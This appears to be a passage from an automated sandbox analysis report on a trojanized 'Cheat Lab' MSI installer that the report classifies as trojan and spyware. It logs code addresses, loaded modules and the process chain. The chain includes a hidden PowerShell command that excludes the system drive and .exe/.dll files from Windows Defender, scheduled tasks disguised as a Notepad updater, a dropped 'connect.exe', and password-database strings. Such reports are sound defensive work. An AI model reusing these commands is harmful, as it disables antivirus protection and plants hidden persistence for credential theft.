                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exeCode function: 18_2_00007FF6FE0AB6BC18_2_00007FF6FE0AB6BC
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exeCode function: 18_2_00007FF6FE09B44818_2_00007FF6FE09B448
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exeCode function: 18_2_00007FF6FE07516018_2_00007FF6FE075160
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exeCode function: 18_2_00007FF6FE09518418_2_00007FF6FE095184
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exeCode function: 18_2_00007FF6FE03118018_2_00007FF6FE031180
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exeCode function: 18_2_00007FF6FE0B31F418_2_00007FF6FE0B31F4
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exeCode function: 18_2_00007FF6FE0A6FC418_2_00007FF6FE0A6FC4
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exeCode function: 18_2_00007FF6FE09708018_2_00007FF6FE097080
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exeCode function: 18_2_00007FF6FE05AD6018_2_00007FF6FE05AD60
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exeCode function: 18_2_00007FF6FDFF6BC018_2_00007FF6FDFF6BC0
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exeCode function: 18_2_00007FF6FE088C1418_2_00007FF6FE088C14
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exeCode function: 18_2_00007FF6FE0B2C7418_2_00007FF6FE0B2C74
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exeCode function: 18_2_00007FF6FE094C8418_2_00007FF6FE094C84
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exeCode function: 18_2_00007FF6FE0AACB018_2_00007FF6FE0AACB0
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exeCode function: 18_2_00007FF6FE08CD1C18_2_00007FF6FE08CD1C
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exeCode function: 18_2_00007FF6FE08894818_2_00007FF6FE088948
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exeCode function: 18_2_00007FF6FE0B29E018_2_00007FF6FE0B29E0
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exeCode function: 18_2_00007FF6FDFF6A0018_2_00007FF6FDFF6A00
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exeCode function: 18_2_00007FF6FE07AB0018_2_00007FF6FE07AB00
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exeCode function: 18_2_00007FF6FE0A482818_2_00007FF6FE0A4828
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exeCode function: 18_2_00007FF6FE03287E18_2_00007FF6FE03287E
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exeCode function: 18_2_00007FF6FE0B28FC18_2_00007FF6FE0B28FC
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exeCode function: 18_2_00007FF6FE08865418_2_00007FF6FE088654
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exeCode function: 18_2_00007FF6FE08837418_2_00007FF6FE088374
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exeCode function: 18_2_00007FF6FE0AC47C18_2_00007FF6FE0AC47C
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exeCode function: 18_2_00007FF6FE08C4CC18_2_00007FF6FE08C4CC
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exeCode function: 18_2_00007FF6FE0A04E818_2_00007FF6FE0A04E8
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exeCode function: 18_2_00007FF6FE07453018_2_00007FF6FE074530
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exeCode function: 18_2_00007FF6FE02229018_2_00007FF6FE022290
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exeCode function: 18_2_00007FF6FE0A82B018_2_00007FF6FE0A82B0
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeCode function: 21_3_00007FF7142ED0DC21_3_00007FF7142ED0DC
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeCode function: 21_3_00007FF7142ED64621_3_00007FF7142ED646
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_0040100022_2_00401000
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_0040122022_2_00401220
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_00401F4A22_2_00401F4A
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_00BC084822_2_00BC0848
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_00BC1B6822_2_00BC1B68
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_00BC083822_2_00BC0838
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_00BC58AF22_2_00BC58AF
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_00BC1B5922_2_00BC1B59
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_02636AB822_2_02636AB8
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_0263004022_2_02630040
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_026318AF22_2_026318AF
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_0263112822_2_02631128
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_0263373122_2_02633731
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_02632C1022_2_02632C10
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_02633D1022_2_02633D10
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_0263058122_2_02630581
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_0263000722_2_02630007
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_02630CC022_2_02630CC0
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_04CE41A422_2_04CE41A4
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_04CECF1022_2_04CECF10
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_04CE998822_2_04CE9988
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_04CE10B422_2_04CE10B4
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_04CE306822_2_04CE3068
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_04CE307822_2_04CE3078
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_04CE503022_2_04CE5030
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_04CE41A122_2_04CE41A1
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_04CECF0022_2_04CECF00
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_07FDCFA822_2_07FDCFA8
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_07FDEF8822_2_07FDEF88
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_07FDAF4022_2_07FDAF40
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_07FDEA3F22_2_07FDEA3F
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_07FDF27922_2_07FDF279
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_07FDA20822_2_07FDA208
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_07FDC8E022_2_07FDC8E0
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_08083D5022_2_08083D50
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_0808820022_2_08088200
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_080A0B2022_2_080A0B20
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_080A8EC022_2_080A8EC0
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_080A054022_2_080A0540
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_080A395022_2_080A3950
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_080A396022_2_080A3960
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_080A118022_2_080A1180
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_080F8C5022_2_080F8C50
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_080FA00822_2_080FA008
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_080F93D022_2_080F93D0
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_080FD48C22_2_080FD48C
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_080FD48C22_2_080FD48C
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_080FD48C22_2_080FD48C
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_081222C022_2_081222C0
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_081257B222_2_081257B2
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_081242D422_2_081242D4
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_0815A02022_2_0815A020
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_0815A8F022_2_0815A8F0
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_081529F822_2_081529F8
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_0815F25822_2_0815F258
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_0815CB4822_2_0815CB48
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_08154D9022_2_08154D90
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_0815C14022_2_0815C140
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_0815CB3822_2_0815CB38
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_08159CD822_2_08159CD8
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_08154D8022_2_08154D80
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_0815DE5422_2_0815DE54
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_08D9388D22_2_08D9388D
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_08D9291722_2_08D92917
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_08D9793022_2_08D97930
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_08D90C9022_2_08D90C90
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_08D96D7022_2_08D96D70
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_08D9004022_2_08D90040
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_08D9325022_2_08D93250
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_08D9533B22_2_08D9533B
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_08D945C822_2_08D945C8
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_08D9A6D822_2_08D9A6D8
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_08D916D022_2_08D916D0
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_08D996C822_2_08D996C8
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_08D96D6022_2_08D96D60
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_08D9244822_2_08D92448
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_08D945C522_2_08D945C5
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_0963004022_2_09630040
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_0963F0D022_2_0963F0D0
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_0963E27022_2_0963E270
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_0963BAB122_2_0963BAB1
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_096375A822_2_096375A8
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_09638E8022_2_09638E80
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_0963E8E822_2_0963E8E8
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_0963F0BF22_2_0963F0BF
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_0963C3F122_2_0963C3F1
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_0963E25F22_2_0963E25F
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_09638E7022_2_09638E70
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_09637A9222_2_09637A92
                    Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                    Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                    Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                    Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: starttiledata.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                    Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSIBD45.tmpJump to behavior
                    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\66bc0c.msiJump to behavior
                    Source: C:\Windows\Installer\MSIC01A.tmpCode function: String function: 00F53292 appears 70 times
                    Source: C:\Windows\Installer\MSIC01A.tmpCode function: String function: 00F53790 appears 39 times
                    Source: C:\Windows\Installer\MSIC01A.tmpCode function: String function: 00F5325F appears 103 times
                    Source: Cheat.Lab.2.7.2.msiBinary or memory string: OriginalFilenameviewer.exeF vs Cheat.Lab.2.7.2.msi
                    Source: Cheat.Lab.2.7.2.msiBinary or memory string: OriginalFilenameaischeduler.dllF vs Cheat.Lab.2.7.2.msi
                    Source: Cheat.Lab.2.7.2.msiBinary or memory string: OriginalFilenameAICustAct.dllF vs Cheat.Lab.2.7.2.msi
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\WVS7RGNO.htmJump to behavior
                    Source: classification engineClassification label: mal60.troj.spyw.evad.winMSI@30/50@2/4
                    Source: C:\Windows\SysWOW64\msiexec.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeCode function: 9_2_00007FF738ABEE80 GetLastError,FormatMessageA,9_2_00007FF738ABEE80
                    Source: C:\Windows\Installer\MSIC01A.tmpCode function: 6_2_00F345B0 LoadResource,LockResource,SizeofResource,6_2_00F345B0
                    Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\Cheat Lab IncJump to behavior
                    Source: C:\Windows\Installer\MSIC01A.tmpProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /C ""C:\Program Files\Cheat Lab Inc\Cheat Lab\exclusion.bat"
                    Source: C:\Windows\Installer\MSIC01A.tmpKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: unknownProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\Cheat.Lab.2.7.2.msi"
                    Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                    Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding F46D88023010FA67F9BE0B7659EC2472 C
                    Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding CF599F91F9CA52D79045F3DD2E6AB85B
                    Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 2387AF9F5B3315EE543DBCEF741FA41F E Global\MSI0000
                    Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSIC01A.tmp C:\Windows\Installer\MSIC01A.tmp" /EnforcedRunAsAdmin /RunAsAdmin /HideWindow "C:\Program Files\Cheat Lab Inc\Cheat Lab\exclusion.bat
                    Source: C:\Windows\Installer\MSIC01A.tmpProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /C ""C:\Program Files\Cheat Lab Inc\Cheat Lab\exclusion.bat"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe" "C:\Program Files\Cheat Lab Inc\Cheat Lab\script.lua
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force"
                    Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe" "C:\Program Files\Cheat Lab Inc\Cheat Lab\script.lua
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /sc daily /st 11:45 /f /tn NotepadUpdateTask_NzEz /tr ""C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exe" "C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\script.lua""
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /sc daily /st 11:45 /f /tn "LuaJIT" /tr ""C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe" "C:\Program Files\Cheat Lab Inc\Cheat Lab\script.lua""
                    Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exe C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exe C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\script.lua
                    Source: unknownProcess created: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe" "C:\Program Files\Cheat Lab Inc\Cheat Lab\script.lua
                    Source: unknownProcess created: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe" "C:\Program Files\Cheat Lab Inc\Cheat Lab\script.lua
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeProcess created: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding F46D88023010FA67F9BE0B7659EC2472 CJump to behavior
                    Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding CF599F91F9CA52D79045F3DD2E6AB85BJump to behavior
                    Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 2387AF9F5B3315EE543DBCEF741FA41F E Global\MSI0000Jump to behavior
                    Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSIC01A.tmp C:\Windows\Installer\MSIC01A.tmp" /EnforcedRunAsAdmin /RunAsAdmin /HideWindow "C:\Program Files\Cheat Lab Inc\Cheat Lab\exclusion.batJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe" "C:\Program Files\Cheat Lab Inc\Cheat Lab\script.luaJump to behavior
                    Source: C:\Windows\Installer\MSIC01A.tmpProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /C ""C:\Program Files\Cheat Lab Inc\Cheat Lab\exclusion.bat" Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force"Jump to behavior
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /sc daily /st 11:45 /f /tn NotepadUpdateTask_NzEz /tr ""C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEz.exe" "C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\script.lua""Jump to behavior
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /sc daily /st 11:45 /f /tn "LuaJIT" /tr ""C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe" "C:\Program Files\Cheat Lab Inc\Cheat Lab\script.lua""Jump to behavior
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeProcess created: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeJump to behavior
                    Source: C:\Windows\Installer\MSIC01A.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSIAB91.tmpJump to behavior
                    Source: C:\Windows\Installer\MSIC01A.tmpCode function: 6_2_00F34BA0 CoInitialize,CoCreateInstance,VariantInit,VariantClear,IUnknown_QueryService,CoAllowSetForegroundWindow,SysAllocString,SysAllocString,SysAllocString,SysAllocString,VariantInit,OpenProcess,WaitForSingleObject,GetExitCodeProcess,CloseHandle,LocalFree,VariantClear,VariantClear,VariantClear,VariantClear,VariantClear,SysFreeString,VariantClear,CoUninitialize,_com_issue_error,6_2_00F34BA0
                    Source: connect.exe, 00000016.00000002.2133528800.0000000002D27000.00000004.00000800.00020000.00000000.sdmp, connect.exe, 00000016.00000002.2133528800.0000000002D11000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dllJump to behavior
                    Source: C:\Windows\Installer\MSIC01A.tmpCode function: 6_2_00F33860 CreateToolhelp32Snapshot,CloseHandle,Process32FirstW,OpenProcess,CloseHandle,Process32NextW,CloseHandle,6_2_00F33860
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1160:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7276:120:WilError_03
                    Source: C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exeMutant created: \Sessions\1\BaseNamedObjects\Sun713
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1196:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7380:120:WilError_03
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCommand line argument: PE@22_2_004044A0
